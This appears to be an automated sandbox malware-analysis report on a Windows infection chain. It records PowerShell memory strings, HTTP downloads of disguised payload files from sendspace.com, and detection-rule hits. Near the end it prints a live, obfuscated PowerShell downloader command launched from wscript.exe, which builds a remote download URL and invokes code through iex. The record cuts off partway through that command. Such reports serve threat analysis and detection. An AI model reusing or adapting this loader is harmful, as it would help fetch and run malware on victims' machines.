Source: |
Binary string: CallSite.Targetore.pdbj source: powershell.exe, 00000008.00000002.1954692113.00000000077D6000.00000004.00000020.00020000.00000000.sdmp |
Source: |
Binary string: System.Management.Automation.pdb source: powershell.exe, 00000008.00000002.1954692113.0000000007775000.00000004.00000020.00020000.00000000.sdmp |
Source: |
Binary string: a`ystem.pdbpdbtem.pdb source: powershell.exe, 00000002.00000002.2027958959.0000016CA38B5000.00000004.00000020.00020000.00000000.sdmp |
Source: |
Binary string: \??\C:\Windows\dll\System.Management.Automation.pdb source: powershell.exe, 00000008.00000002.1959428838.0000000008919000.00000004.00000020.00020000.00000000.sdmp |
Source: |
Binary string: \??\C:\Windows\Microsoft.Net\assembly\GAC_MSIL\System.Core\v4.0_4.0.0.0__b77a5c561934e089\System.Core.pdb5 source: powershell.exe, 00000008.00000002.1954692113.0000000007784000.00000004.00000020.00020000.00000000.sdmp |
Source: |
Binary string: System.Core.pdb source: powershell.exe, 00000002.00000002.2159560883.0000016CBDA15000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 00000008.00000002.1954692113.0000000007775000.00000004.00000020.00020000.00000000.sdmp |
Source: |
Binary string: \??\C:\Windows\Microsoft.Net\assembly\GAC_MSIL\System.Management.Automation\v4.0_3.0.0.0__31bf3856ad364e35\System.Management.Automation.pdb source: powershell.exe, 00000002.00000002.2159560883.0000016CBD9F9000.00000004.00000020.00020000.00000000.sdmp |
Source: |
Binary string: \??\C:\Windows\System.Management.Automation.pdb source: powershell.exe, 00000008.00000002.1954692113.00000000077D6000.00000004.00000020.00020000.00000000.sdmp |
Source: |
Binary string: anagement.Automation.pdb source: powershell.exe, 00000002.00000002.2155969999.0000016CBD76C000.00000004.00000020.00020000.00000000.sdmp |
Source: |
Binary string: ws\System.Core.pdbD source: powershell.exe, 00000002.00000002.2027958959.0000016CA38B5000.00000004.00000020.00020000.00000000.sdmp |
Source: |
Binary string: \??\C:\Windows\Microsoft.Net\assembly\GAC_MSIL\System.Management.Automation\v4.0_3.0.0.0__31bf3856ad364e35\System.Management.Automation.pdbRT-P source: powershell.exe, 00000008.00000002.1954692113.0000000007811000.00000004.00000020.00020000.00000000.sdmp |
Source: |
Binary string: System.Core.pdbk source: powershell.exe, 00000002.00000002.2159560883.0000016CBDA15000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 00000008.00000002.1954692113.0000000007775000.00000004.00000020.00020000.00000000.sdmp |
Source: |
Binary string: \??\C:\Windows\Microsoft.Net\assembly\GAC_MSIL\System.Core\v4.0_4.0.0.0__b77a5c561934e089\System.Core.pdb source: powershell.exe, 00000008.00000002.1954692113.0000000007784000.00000004.00000020.00020000.00000000.sdmp |
Source: global traffic |
HTTP traffic detected: GET /pro/dl/ppxodm HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:121.0) Gecko/20100101 Firefox/121.0Host: www.sendspace.comConnection: Keep-Alive |
Source: global traffic |
HTTP traffic detected: GET /pro/dl/ppxodm HTTP/1.1Host: www.sendspace.com |
Source: global traffic |
HTTP traffic detected: GET /dlpro/ab0d4132c177b6677608eb6f24e68e83/664f6df0/ppxodm/Turde.jpb HTTP/1.1Host: fs03n5.sendspace.comConnection: Keep-Alive |
Source: global traffic |
HTTP traffic detected: GET /pro/dl/8gikly HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:121.0) Gecko/20100101 Firefox/121.0Host: www.sendspace.comCache-Control: no-cache |
Source: global traffic |
HTTP traffic detected: GET /dlpro/3a2e390c959a9f37c8f0aa7f6af4be82/664f6e17/8gikly/WySjCpJeTvpFxCC108.bin HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:121.0) Gecko/20100101 Firefox/121.0Cache-Control: no-cacheHost: fs13n3.sendspace.comConnection: Keep-AliveCookie: SID=7cbl3ctvlcko76s2guour4vig6 |
Source: powershell.exe, 00000008.00000002.1954692113.00000000077D6000.00000004.00000020.00020000.00000000.sdmp |
String found in binary or memory: http://crl.micro |
Source: powershell.exe, 00000002.00000002.2030954213.0000016CA75A0000.00000004.00000800.00020000.00000000.sdmp |
String found in binary or memory: http://fs03n3.sendspace.com |
Source: powershell.exe, 00000002.00000002.2030954213.0000016CA5A1F000.00000004.00000800.00020000.00000000.sdmp |
String found in binary or memory: http://fs03n5.sendspace.com |
Source: powershell.exe, 00000002.00000002.2143669387.0000016CB53E2000.00000004.00000800.00020000.00000000.sdmp |
String found in binary or memory: http://nuget.org/NuGet.exe |
Source: powershell.exe, 00000002.00000002.2030954213.0000016CA5597000.00000004.00000800.00020000.00000000.sdmp |
String found in binary or memory: http://pesterbdd.com/images/Pester.png |
Source: powershell.exe, 00000002.00000002.2030954213.0000016CA5371000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000008.00000002.1946860119.0000000004E91000.00000004.00000800.00020000.00000000.sdmp, wab.exe, 0000000B.00000002.2686700696.00000000226D1000.00000004.00000800.00020000.00000000.sdmp |
String found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name |
Source: powershell.exe, 00000002.00000002.2030954213.0000016CA5597000.00000004.00000800.00020000.00000000.sdmp |
String found in binary or memory: http://www.apache.org/licenses/LICENSE-2.0.html |
Source: powershell.exe, 00000002.00000002.2030954213.0000016CA58BF000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000002.00000002.2030954213.0000016CA7569000.00000004.00000800.00020000.00000000.sdmp |
String found in binary or memory: http://www.sendspace.com |
Source: powershell.exe, 00000002.00000002.2030954213.0000016CA5371000.00000004.00000800.00020000.00000000.sdmp |
String found in binary or memory: https://aka.ms/pscore68 |
Source: powershell.exe, 00000008.00000002.1946860119.0000000004E91000.00000004.00000800.00020000.00000000.sdmp |
String found in binary or memory: https://aka.ms/pscore6lB |
Source: powershell.exe, 00000002.00000002.2143669387.0000016CB53E2000.00000004.00000800.00020000.00000000.sdmp |
String found in binary or memory: https://contoso.com/ |
Source: powershell.exe, 00000002.00000002.2143669387.0000016CB53E2000.00000004.00000800.00020000.00000000.sdmp |
String found in binary or memory: https://contoso.com/Icon |
Source: powershell.exe, 00000002.00000002.2143669387.0000016CB53E2000.00000004.00000800.00020000.00000000.sdmp |
String found in binary or memory: https://contoso.com/License |
Source: powershell.exe, 00000002.00000002.2030954213.0000016CA758D000.00000004.00000800.00020000.00000000.sdmp |
String found in binary or memory: https://fs03n3.sendspaX |
Source: powershell.exe, 00000002.00000002.2030954213.0000016CA758D000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000002.00000002.2030954213.0000016CA58AF000.00000004.00000800.00020000.00000000.sdmp |
String found in binary or memory: https://fs03n3.sendspace.com |
Source: powershell.exe, 00000002.00000002.2030954213.0000016CA7569000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000002.00000002.2030954213.0000016CA7589000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000002.00000002.2030954213.0000016CA758D000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000002.00000002.2030954213.0000016CA5893000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000002.00000002.2030954213.0000016CA58AF000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000002.00000002.2030954213.0000016CA58AB000.00000004.00000800.00020000.00000000.sdmp |
String found in binary or memory: https://fs03n3.sendspace.com/dlpro/4b26f029f512f90f3568c85b6d26623d/664f6de9/ppxodm/Turde.jpb |
Source: powershell.exe, 00000002.00000002.2030954213.0000016CA5A1F000.00000004.00000800.00020000.00000000.sdmp |
String found in binary or memory: https://fs03n5.sendspace.com |
Source: powershell.exe, 00000002.00000002.2030954213.0000016CA58BF000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000002.00000002.2030954213.0000016CA58A7000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000002.00000002.2030954213.0000016CA5A1F000.00000004.00000800.00020000.00000000.sdmp |
String found in binary or memory: https://fs03n5.sendspace.com/dlpro/ab0d4132c177b6677608eb6f24e68e83/664f6df0/ppxodm/Turde.jpb |
Source: wab.exe, 0000000B.00000003.1931143615.0000000006E14000.00000004.00000020.00020000.00000000.sdmp |
String found in binary or memory: https://fs13n3.sendspace.com/ |
Source: wab.exe, 0000000B.00000003.1945545305.0000000006E14000.00000004.00000020.00020000.00000000.sdmp, wab.exe, 0000000B.00000002.2672655270.0000000006DFF000.00000004.00000020.00020000.00000000.sdmp |
String found in binary or memory: https://fs13n3.sendspace.com/Di |
Source: wab.exe, 0000000B.00000003.1945545305.0000000006E14000.00000004.00000020.00020000.00000000.sdmp, wab.exe, 0000000B.00000003.1931143615.0000000006E14000.00000004.00000020.00020000.00000000.sdmp |
String found in binary or memory: https://fs13n3.sendspace.com/_i |
Source: wab.exe, 0000000B.00000003.1931143615.0000000006E14000.00000004.00000020.00020000.00000000.sdmp |
String found in binary or memory: https://fs13n3.sendspace.com/c8f0aa7f6af4be82/664f6e17/8gikly/WySjCpJeTvpFxCC108.bin |
Source: wab.exe, 0000000B.00000003.1931143615.0000000006E14000.00000004.00000020.00020000.00000000.sdmp |
String found in binary or memory: https://fs13n3.sendspace.com/dlpro/3a2e390c959a9f37c8f0aa7f6af4be82/664f6e17/8gikly/WySjCpJeTvpFxCC1 |
Source: wab.exe, 0000000B.00000003.1945545305.0000000006E14000.00000004.00000020.00020000.00000000.sdmp, wab.exe, 0000000B.00000003.1931143615.0000000006E14000.00000004.00000020.00020000.00000000.sdmp |
String found in binary or memory: https://fs13n3.sendspace.com/eh |
Source: wab.exe, 0000000B.00000003.1931143615.0000000006E14000.00000004.00000020.00020000.00000000.sdmp |
String found in binary or memory: https://fs13n3.sendspace.com/om:443 |
Source: powershell.exe, 00000002.00000002.2030954213.0000016CA5597000.00000004.00000800.00020000.00000000.sdmp |
String found in binary or memory: https://github.com/Pester/Pester |
Source: powershell.exe, 00000002.00000002.2030954213.0000016CA60F3000.00000004.00000800.00020000.00000000.sdmp |
String found in binary or memory: https://go.micro |
Source: powershell.exe, 00000002.00000002.2143669387.0000016CB53E2000.00000004.00000800.00020000.00000000.sdmp |
String found in binary or memory: https://nuget.org/nuget.exe |
Source: powershell.exe, 00000002.00000002.2030954213.0000016CA74FA000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000002.00000002.2030954213.0000016CA58BF000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000002.00000002.2030954213.0000016CA5781000.00000004.00000800.00020000.00000000.sdmp |
String found in binary or memory: https://www.sendspace.com |
Source: wab.exe, 0000000B.00000002.2672655270.0000000006DA8000.00000004.00000020.00020000.00000000.sdmp |
String found in binary or memory: https://www.sendspace.com/ |
Source: wab.exe, 0000000B.00000002.2672655270.0000000006DA8000.00000004.00000020.00020000.00000000.sdmp |
String found in binary or memory: https://www.sendspace.com/FW |
Source: wab.exe, 0000000B.00000002.2672655270.0000000006DE3000.00000004.00000020.00020000.00000000.sdmp, wab.exe, 0000000B.00000002.2672384131.0000000006CE0000.00000004.00001000.00020000.00000000.sdmp, wab.exe, 0000000B.00000003.1931143615.0000000006E14000.00000004.00000020.00020000.00000000.sdmp |
String found in binary or memory: https://www.sendspace.com/pro/dl/8gikly |
Source: wab.exe, 0000000B.00000002.2672655270.0000000006DE3000.00000004.00000020.00020000.00000000.sdmp |
String found in binary or memory: https://www.sendspace.com/pro/dl/8giklyM |
Source: powershell.exe, 00000002.00000002.2030954213.0000016CA5597000.00000004.00000800.00020000.00000000.sdmp |
String found in binary or memory: https://www.sendspace.com/pro/dl/ppxodmP |
Source: powershell.exe, 00000008.00000002.1946860119.0000000004FE8000.00000004.00000800.00020000.00000000.sdmp |
String found in binary or memory: https://www.sendspace.com/pro/dl/ppxodmXR |
Source: unknown |
Network traffic detected: HTTP traffic on port 49708 -> 443 |
Source: unknown |
Network traffic detected: HTTP traffic on port 443 -> 49711 |
Source: unknown |
Network traffic detected: HTTP traffic on port 49710 -> 443 |
Source: unknown |
Network traffic detected: HTTP traffic on port 443 -> 49710 |
Source: unknown |
Network traffic detected: HTTP traffic on port 49706 -> 443 |
Source: unknown |
Network traffic detected: HTTP traffic on port 49705 -> 443 |
Source: unknown |
Network traffic detected: HTTP traffic on port 49711 -> 443 |
Source: unknown |
Network traffic detected: HTTP traffic on port 443 -> 49708 |
Source: unknown |
Network traffic detected: HTTP traffic on port 443 -> 49706 |
Source: unknown |
Network traffic detected: HTTP traffic on port 443 -> 49705 |
Source: amsi64_7772.amsi.csv, type: OTHER |
Matched rule: Detects PowerShell scripts containing patterns of base64 encoded files, concatenation and execution Author: ditekSHen |
Source: amsi32_5824.amsi.csv, type: OTHER |
Matched rule: Detects PowerShell scripts containing patterns of base64 encoded files, concatenation and execution Author: ditekSHen |
Source: Process Memory Space: powershell.exe PID: 7772, type: MEMORYSTR |
Matched rule: Detects PowerShell scripts containing patterns of base64 encoded files, concatenation and execution Author: ditekSHen |
Source: Process Memory Space: powershell.exe PID: 5824, type: MEMORYSTR |
Matched rule: Detects PowerShell scripts containing patterns of base64 encoded files, concatenation and execution Author: ditekSHen |
Source: C:\Windows\System32\wscript.exe |
Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" "$Firtallene = 1;$Aspergilla='Su';$Aspergilla+='bstrin';$Aspergilla+='g';Function Jammerklagen($Trykluftsapparaterne){$Dialogkort223agttagen=$Trykluftsapparaterne.Length-$Firtallene;For($Dialogkort223=5;$Dialogkort223 -lt $Dialogkort223agttagen;$Dialogkort223+=6){$Nettofortjeneste+=$Trykluftsapparaterne.$Aspergilla.Invoke( $Dialogkort223, $Firtallene);}$Nettofortjeneste;}function Nassedes($Bibliografers){. ($Herskabshuset) ($Bibliografers);}$Kirkegange=Jammerklagen 'UltraM atioInd.pz Gasai Ropelafsenl Kon,aStrer/Omsor5Sickl.Alan,0P,raf Walle(HumilWT,ssui Reson .ragdIkke,oSimilwSkrigsStift SkrivNovervTUnor. Har 1Soupi0Beskn.Sekar0Kalve; Mult ,oogaWTierciD.kkenPers 6Hardw4Twal.;Do,im Tonefx Ener6 efri4Abeka;Caboo MerskrUndervEspr.:Finge1preju2Keyse1 Tena.Skaer0Clogg)Nonfo Extr,GPoly,e N.tucMonoskFrounoOhmm /Shor 2Tyr.n0Dott 1Exten0 oder0Lsbla1Wha.v0Ple e1 Spyt At amF Empli.rocerSvedtechirmfDamp.oTribuxBlind/I.aer1Concr2S,ent1Ives.. Selv0Brnea ';$Hydrosalt223=Jammerklagen 'AgronUGarvnsWurtzeUnecorFawni- N,nnA ClumgStepuefloc nLandbtPains ';$Chalybean=Jammerklagen ' Skynhconspt Fla,tEaglepFausssH smo:slutt/under/halv,w NutgwDefinwKat e. Kl bsZarzueLunksnkunstdDrencs EmbipAfgi.aEkspocDe aieHedvi.bankrcVeneroExaggmReint/GuttepLinierpreezo .nde/trylld Penul ,dan/Frig,p nig p OverxAfideoEfterdForfam Pens ';$Microgramming=Jammerklagen ' .ebu> fbr ';$Herskabshuset=Jammerklagen 'FormkiFornye Ti exBank, ';$Nikkelets='Cikorieekstrakters';Nassedes (Jammerklagen 'TilenSRumm eCevittsparr-OversCBuxtooForbinOve ttSubcleCamounCanedtOvere Cardi-Un loPPseudaPr tetForsth Plea .atefT Card:Ty,og\ AdredSer,iiProbam sin.eAchennVasessli uru ,ilamSand,.,upletBackoxFouritAlrun Hyst- TvejV Li.ea flu.lMikr uHypere Asso photo$ PortNTordei,ndavkUdda.kNonfee,ftallT iazeVag,btO.kresSkrab; Abel ');Nassedes (Jammerklagen '.rsteiTerriftetan Waist(Tecovt TesseEkseksForbltpiker-unharp RecaaCalort KashhNysen ,lfacTKombi:Mulci\Moruld,onyaiJubjum Erhve F.lgnKonsts LagnuTubipm Fru,.AlloktVennexMugglt bagf)Ander{,ickeeMeadwx Non.iDisiltPrec }Viren;Tppe, ');$Unsolidifiable = Jammerklagen 'Fluttekar ocWarplhCharmoKoler pocy%AeoniaVogtep VarepSubindBumseaExcomtLae,ea ,erl%catar\ AgamBFaglolTyre,aSlutsnAmninkSp.erofluor. unmoPMariorChannoPhleb Misbe&Julet&sknhe Om,rbe,eisecF.rskhRe.itoBili. A,ce$finko ';Nassedes (Jammerklagen |